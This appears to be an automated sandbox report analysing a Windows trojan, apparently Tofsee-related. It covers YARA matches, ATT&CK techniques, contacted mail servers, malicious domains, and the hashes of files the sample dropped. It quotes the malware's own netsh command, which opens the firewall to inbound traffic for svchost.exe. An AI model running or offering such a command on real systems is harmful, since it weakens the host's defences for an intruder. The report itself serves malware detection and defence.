        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 874A7cigvX.exe PID: 2796, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xvkslbws.exe PID: 1440, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6204, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 874A7cigvX.exe PID: 2796, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xvkslbws.exe PID: 1440, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6204, type: MEMORYSTR
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,0_2_004088B0
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeCode function: 12_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,12_2_004088B0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_030F88B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,15_2_030F88B0
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Valid Accounts
        1
        Native API
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        3
        Disable or Modify Tools
        OS Credential Dumping2
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts3
        Service Execution
        1
        Valid Accounts
        1
        Valid Accounts
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop ProtocolData from Removable Media12
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt14
        Windows Service
        1
        Access Token Manipulation
        3
        Obfuscated Files or Information
        Security Account Manager1
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook14
        Windows Service
        22
        Software Packing
        NTDS15
        System Information Discovery
        Distributed Component Object ModelInput Capture112
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script412
        Process Injection
        1
        DLL Side-Loading
        LSA Secrets11
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion
        Cached Domain Credentials1
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
        Masquerading
        DCSync1
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Valid Accounts
        Proc Filesystem1
        System Owner/User Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Virtualization/Sandbox Evasion
        /etc/passwd and /etc/shadow1
        System Network Configuration Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Access Token Manipulation
        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd412
        Process Injection
        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1506014 Sample: 874A7cigvX.exe Startdate: 07/09/2024 Architecture: WINDOWS Score: 100 43 yahoo.com 2->43 45 vanaheim.cn 2->45 47 6 other IPs or domains 2->47 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 10 other signatures 2->61 8 xvkslbws.exe 2->8         started        11 874A7cigvX.exe 2 2->11         started        signatures3 process4 file5 63 Detected unpacking (changes PE section rights) 8->63 65 Detected unpacking (overwrites its own PE header) 8->65 67 Writes to foreign memory regions 8->67 73 2 other signatures 8->73 14 svchost.exe 1 8->14         started        41 C:\Users\user\AppData\Local\...\xvkslbws.exe, PE32 11->41 dropped 69 Uses netsh to modify the Windows network and firewall settings 11->69 71 Modifies the windows firewall 11->71 18 cmd.exe 1 11->18         started        21 netsh.exe 2 11->21         started        23 cmd.exe 2 11->23         started        25 3 other processes 11->25 signatures6 process7 dnsIp8 49 mta7.am0.yahoodns.net 67.195.204.74, 25 YAHOO-3US United States 14->49 51 microsoft-com.mail.protection.outlook.com 52.101.42.0, 25 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 14->51 53 3 other IPs or domains 14->53 75 System process connects to network (likely due to code injection or exploit) 14->75 77 Deletes itself after installation 14->77 79 Adds extensions / path to Windows Defender exclusion list (Registry) 14->79 39 C:\Windows\SysWOW64\...\xvkslbws.exe (copy), PE32 18->39 dropped 27 conhost.exe 18->27         started        29 conhost.exe 21->29         started        31 conhost.exe 23->31         started        33 conhost.exe 25->33         started        35 conhost.exe 25->35         started        37 conhost.exe 25->37         started        file9 signatures10 process11

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        874A7cigvX.exe68%VirustotalBrowse
        874A7cigvX.exe68%ReversingLabsWin32.Trojan.Convagent
        874A7cigvX.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\xvkslbws.exe100%Joe Sandbox ML
        No Antivirus matches
        SourceDetectionScannerLabelLink
        mxs.mail.ru0%VirustotalBrowse
        mta7.am0.yahoodns.net1%VirustotalBrowse
        microsoft-com.mail.protection.outlook.com0%VirustotalBrowse
        vanaheim.cn16%VirustotalBrowse
        google.com0%VirustotalBrowse
        yahoo.com0%VirustotalBrowse
        mail.ru0%VirustotalBrowse
        smtp.google.com0%VirustotalBrowse
        SourceDetectionScannerLabelLink
        vanaheim.cn:443100%Avira URL Cloudphishing
        jotunheim.name:443100%Avira URL Cloudmalware
        vanaheim.cn:4438%VirustotalBrowse
        jotunheim.name:44313%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        mxs.mail.ru
        217.69.139.150
        truetrueunknown
        mta7.am0.yahoodns.net
        67.195.204.74
        truetrueunknown
        microsoft-com.mail.protection.outlook.com
        52.101.42.0
        truetrueunknown
        vanaheim.cn
        77.232.41.29
        truetrueunknown
        smtp.google.com
        64.233.166.26
        truefalseunknown
        google.com
        unknown
        unknowntrueunknown
        yahoo.com
        unknown
        unknowntrueunknown
        mail.ru
        unknown
        unknowntrueunknown
        NameMaliciousAntivirus DetectionReputation
        vanaheim.cn:443true
        • 8%, Virustotal, Browse
        • Avira URL Cloud: phishing
        unknown
        jotunheim.name:443true
        • 13%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        52.101.42.0
        microsoft-com.mail.protection.outlook.comUnited States
        8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
        64.233.166.26
        smtp.google.comUnited States
        15169GOOGLEUSfalse
        217.69.139.150
        mxs.mail.ruRussian Federation
        47764MAILRU-ASMailRuRUtrue
        77.232.41.29
        vanaheim.cnRussian Federation
        28968EUT-ASEUTIPNetworkRUtrue
        67.195.204.74
        mta7.am0.yahoodns.netUnited States
        26101YAHOO-3UStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1506014
        Start date and time:2024-09-07 15:13:59 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 19s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:18
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:874A7cigvX.exe
        renamed because original name is a hash value
        Original Sample Name:Trojan.Autorun.ATA_virussign.com_f7ae445081e10267d2cec9b6b0e2d375.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@22/3@9/5
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 66
        • Number of non-executed functions: 255
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 20.112.250.133, 20.76.201.171, 20.70.246.20, 20.236.44.162, 20.231.239.246
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        09:15:37API Interceptor13x Sleep call for process: svchost.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        52.101.42.0qkkcfptf.exeGet hashmaliciousTofseeBrowse
          fdnoqmpv.exeGet hashmaliciousTofseeBrowse
            .exeGet hashmaliciousUnknownBrowse
              Sm4Ty3Em4z.exeGet hashmaliciousTofseeBrowse
                rRBVVlBwia.exeGet hashmaliciousTofseeBrowse
                  DWoKcG581L.exeGet hashmaliciousTofseeBrowse
                    L7iza9mNDI.exeGet hashmaliciousTofseeBrowse
                      file.exeGet hashmaliciousTofseeBrowse
                        sorteado!!.com.exeGet hashmaliciousUnknownBrowse
                          U9dDsItOij.exeGet hashmaliciousTofseeBrowse
                            217.69.139.150RSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                              ODy57hA4Su.exeGet hashmaliciousTofseeBrowse
                                Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                  knkduwqg.exeGet hashmaliciousTofseeBrowse
                                    foufdsk.exeGet hashmaliciousTofseeBrowse
                                      bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                        Eduhazqw4u.exeGet hashmaliciousTofseeBrowse
                                          SGn3RtDC8Y.exeGet hashmaliciousTofseeBrowse
                                            Sm4Ty3Em4z.exeGet hashmaliciousTofseeBrowse
                                              ewdWlNc8TL.exeGet hashmaliciousTofseeBrowse
                                                77.232.41.29RSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                                                  ODy57hA4Su.exeGet hashmaliciousTofseeBrowse
                                                    Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                                      qkkcfptf.exeGet hashmaliciousTofseeBrowse
                                                        vekvtia.exeGet hashmaliciousTofseeBrowse
                                                          knkduwqg.exeGet hashmaliciousTofseeBrowse
                                                            foufdsk.exeGet hashmaliciousTofseeBrowse
                                                              UUJycuNA6D.exeGet hashmaliciousTofseeBrowse
                                                                bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                                                  67.195.204.74ewdWlNc8TL.exeGet hashmaliciousTofseeBrowse
                                                                    SecuriteInfo.com.Trojan-Ransom.StopCrypt.22110.437.exeGet hashmaliciousTofseeBrowse
                                                                      file.exeGet hashmaliciousTofseeBrowse
                                                                        file.msg.scr.exeGet hashmaliciousUnknownBrowse
                                                                          file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                            l3Qj8QhTYZ.exeGet hashmaliciousPhorpiexBrowse
                                                                              message.elm.exeGet hashmaliciousUnknownBrowse
                                                                                message.txt.exeGet hashmaliciousUnknownBrowse
                                                                                  test.dat.exeGet hashmaliciousUnknownBrowse
                                                                                    Update-KB2984-x86.exeGet hashmaliciousUnknownBrowse
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      mta7.am0.yahoodns.netRSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.228.111
                                                                                      Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.228.109
                                                                                      bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.204.77
                                                                                      Eduhazqw4u.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.228.109
                                                                                      setup.exeGet hashmaliciousTofseeBrowse
                                                                                      • 98.136.96.76
                                                                                      m4Jp2TLBHJ.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.204.77
                                                                                      SecuriteInfo.com.Trojan-Ransom.StopCrypt.22110.437.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.204.74
                                                                                      AvDJi40xp_9fyz7RPmKdbxb4.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.228.94
                                                                                      dIg0MWRViP.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.228.94
                                                                                      rpzOeQ5QzX.exeGet hashmaliciousTofseeBrowse
                                                                                      • 98.136.96.91
                                                                                      microsoft-com.mail.protection.outlook.comRSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.8.49
                                                                                      ODy57hA4Su.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.11.0
                                                                                      Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.8.49
                                                                                      qkkcfptf.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.42.0
                                                                                      vekvtia.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.8.49
                                                                                      knkduwqg.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.11.0
                                                                                      foufdsk.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.40.26
                                                                                      UUJycuNA6D.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.40.26
                                                                                      bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.11.0
                                                                                      Eduhazqw4u.exeGet hashmaliciousTofseeBrowse
                                                                                      • 52.101.8.49
                                                                                      vanaheim.cnRSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      ODy57hA4Su.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      qkkcfptf.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      vekvtia.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      knkduwqg.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      foufdsk.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      UUJycuNA6D.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      Eduhazqw4u.exeGet hashmaliciousTofseeBrowse
                                                                                      • 213.226.112.95
                                                                                      mxs.mail.ruRSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      ODy57hA4Su.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      qkkcfptf.exeGet hashmaliciousTofseeBrowse
                                                                                      • 94.100.180.31
                                                                                      vekvtia.exeGet hashmaliciousTofseeBrowse
                                                                                      • 94.100.180.31
                                                                                      knkduwqg.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      foufdsk.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      UUJycuNA6D.exeGet hashmaliciousTofseeBrowse
                                                                                      • 94.100.180.31
                                                                                      bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      Eduhazqw4u.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUS9Zu52GuKZE.exeGet hashmaliciousUnknownBrowse
                                                                                      • 150.171.27.10
                                                                                      9Zu52GuKZE.exeGet hashmaliciousUnknownBrowse
                                                                                      • 20.105.232.30
                                                                                      https://www.tiktok.com/////link/v2?aid=1988&lang=enpgrt&scene=bio_url&target=google.com.////amp/s/siscoringenieria.com/pelk/distGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.107.246.45
                                                                                      https://connect.nrpa.org/discussion/deputy-director-need-your-help-with-the-rest#bm5d45b988-9c01-4edc-8280-0e45b7ae3f64Get hashmaliciousUnknownBrowse
                                                                                      • 52.179.163.43
                                                                                      https://sso--cdn-sub-coinbasepro-auth.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                      • 150.171.28.10
                                                                                      https://help-cdn--eb-exten-coinbase.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                      • 150.171.28.10
                                                                                      https://learn--sso-cdn---coinbasepro--auth.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                      • 150.171.27.10
                                                                                      https://quickpay-arabian.com/Get hashmaliciousUnknownBrowse
                                                                                      • 150.171.27.10
                                                                                      https://ssomtamask-wallet.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                      • 150.171.28.10
                                                                                      https://clicker.extremelyorange.com/Get hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.57
                                                                                      MAILRU-ASMailRuRURSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      ODy57hA4Su.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      qkkcfptf.exeGet hashmaliciousTofseeBrowse
                                                                                      • 94.100.180.31
                                                                                      vekvtia.exeGet hashmaliciousTofseeBrowse
                                                                                      • 94.100.180.31
                                                                                      knkduwqg.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      foufdsk.exeGet hashmaliciousTofseeBrowse
                                                                                      • 217.69.139.150
                                                                                      UUJycuNA6D.exeGet hashmaliciousTofseeBrowse
                                                                                      • 94.100.180.31
                                                                                      tjigfd64.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 5.181.61.0
                                                                                      tjigfd64.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 5.181.61.0
                                                                                      EUT-ASEUTIPNetworkRURSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      ODy57hA4Su.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      qkkcfptf.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      vekvtia.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      knkduwqg.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      foufdsk.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      UUJycuNA6D.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                                                                      • 77.232.41.29
                                                                                      Set-up.exeGet hashmaliciousCryptbotBrowse
                                                                                      • 77.232.42.234
                                                                                      YAHOO-3USvekvtia.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.204.79
                                                                                      UUJycuNA6D.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.204.77
                                                                                      bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.204.77
                                                                                      firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                      • 74.6.99.126
                                                                                      Sm4Ty3Em4z.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.204.73
                                                                                      ewdWlNc8TL.exeGet hashmaliciousTofseeBrowse
                                                                                      • 67.195.204.74
                                                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 98.139.166.43
                                                                                      https://www.ima-india.com/index.phpGet hashmaliciousUnknownBrowse
                                                                                      • 74.6.138.67
                                                                                      https://www.ima-india.com/index.phpGet hashmaliciousUnknownBrowse
                                                                                      • 74.6.138.67
                                                                                      https://www.ima-india.com/index.php?option=com_content&view=article&id=1092&Itemid=483Get hashmaliciousUnknownBrowse
                                                                                      • 74.6.138.65
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Users\user\Desktop\874A7cigvX.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11205632
                                                                                      Entropy (8bit):4.427228358082004
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:AtRdHbfGeyTf8CJH1ci6aZRVDqQP4n48rMI8gVzuhZIIQFa0lw+QFa0lw+QFa0lr:AtRdHbfByTU3OTBtP44cMYW
                                                                                      MD5:702317DA74C3C1D30ED61EA3A7D7DFCD
                                                                                      SHA1:7D65AF1304C2AA77DF791E21DE687F3302F1170F
                                                                                      SHA-256:409942DBC4AE0F7F3EE1D2EEF70180AB21CCD2707621500BDA9F4B3D28632FF6
                                                                                      SHA-512:F9A432E5D7168701766262EDFEA02E0BFD37651A3F64731DA822B6FB20FE43F5E3541A7AE5E0C825A9B1D1CE1064F1FE2CBFAD2139A2F4D85796961416739CDD
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.O-6.!~6.!~6.!~Y..~*.!~Y..~/.!~Y..~D.!~?..~1.!~6. ~..!~Y..~7.!~Y..~7.!~Y..~7.!~Rich6.!~................PE..L......d.............................l............@.............................................................................P.......P...........................................................@N..@............................................text...T........................... ..`.data............|..................@....yey.................t..............@..@.rsrc...P............x..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11205632
                                                                                      Entropy (8bit):4.427228358082004
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:AtRdHbfGeyTf8CJH1ci6aZRVDqQP4n48rMI8gVzuhZIIQFa0lw+QFa0lw+QFa0lr:AtRdHbfByTU3OTBtP44cMYW
                                                                                      MD5:702317DA74C3C1D30ED61EA3A7D7DFCD
                                                                                      SHA1:7D65AF1304C2AA77DF791E21DE687F3302F1170F
                                                                                      SHA-256:409942DBC4AE0F7F3EE1D2EEF70180AB21CCD2707621500BDA9F4B3D28632FF6
                                                                                      SHA-512:F9A432E5D7168701766262EDFEA02E0BFD37651A3F64731DA822B6FB20FE43F5E3541A7AE5E0C825A9B1D1CE1064F1FE2CBFAD2139A2F4D85796961416739CDD
                                                                                      Malicious:true
